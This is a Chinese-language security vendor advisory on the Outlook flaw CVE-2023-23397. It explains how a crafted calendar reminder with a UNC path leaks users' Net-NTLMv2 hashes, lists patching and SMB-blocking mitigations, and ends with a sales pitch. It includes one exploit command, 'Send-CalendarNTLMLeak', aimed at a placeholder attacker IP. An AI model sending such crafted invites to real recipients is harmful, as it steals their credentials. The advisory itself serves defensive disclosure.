Outlook（CVE-2023-23397）的檢測復現與修復

前言

安盟信息實驗室安全研究員最近發現CVE-2023-23397(outlook漏洞)在野利用，由于outlook在企業中廣泛使用，護網在即，為避免漏洞利用造成的危害，他們復現了該漏洞。

漏洞描述

Microsoft Office Outlook是微軟辦公軟件套裝的組件之一，可以用來收發電子郵件、管理聯系人信息、安排日程等功能。

CVE-2023-23397是Microsoft Outlook欺騙漏洞，可導致身份驗證繞過，未經身份驗證的攻擊者可以通過向受影響的系統發送特制電子郵件來利用該漏洞獲取用戶的Net-NTLMv2哈希。

漏洞原理

攻擊者向受害者發送一條帶有MAPI（Messaging Application Programming Interface）屬性的消息，其中UNC路徑為攻擊者控制的服務器上的SMB（TCP 445端口）。攻擊者發送帶有惡意日歷邀請的郵件，來使“PidLidReminderFileParameter”（提醒的自定義警報聲音選項）觸發易受攻擊的 API 端點 PlayReminderSound。部分Poc代碼如下：

漏洞利用

Send-CalendarNTLMLeak -recipient "收件郵箱地址XXXX@XX.COM" -remotefilepath "\\攻擊機IP\d.wav" -meetingsubject "會議主題" -meetingbody "會議內容"

觸發UNC_PATH成功抓到HASH：

緩解措施

1.立即應用供應商補丁。微軟發布了一個補丁，作為其 2023 年 3 月月度安全更新的一部分。

2.阻止 TCP 445/SMB 從您的網絡出站。這將阻止將 NTLM 身份驗證消息發送到遠程文件共享。如果無法做到這一點，我們建議監控通過端口 445 的出站流量以查找未知的外部 IP 地址，然后識別并阻止它們。

3.客戶可以禁用 WebClient 服務。請注意，這將阻止所有 WebDAV 連接，包括內聯網。

4.將用戶添加到受保護的用戶安全組。這會阻止使用 NTLM 作為身份驗證機制，但請注意，這可能會影響在您的環境中依賴 NTLM 的應用程序。

5.在客戶端和服務器上強制執行 SMB 簽名以防止中繼攻擊。

其他研究人員指出，禁用Outlook 中的“顯示提醒”設置可以防止 NTLM 憑據泄露。

安盟信息依托豐富的實踐經驗與雄厚技術研發實力，積極發揮自身檢測預警的優勢，全面掌握漏洞動態，為各行業客戶提供全方位的網絡安全解決方案，快速提升客戶整體網絡安全性，如有漏洞檢測與應急需求，請及時聯系我們。安盟信息靈犀實驗室可以提供完整的解決方案與檢測腳本，全方位為您保駕護航！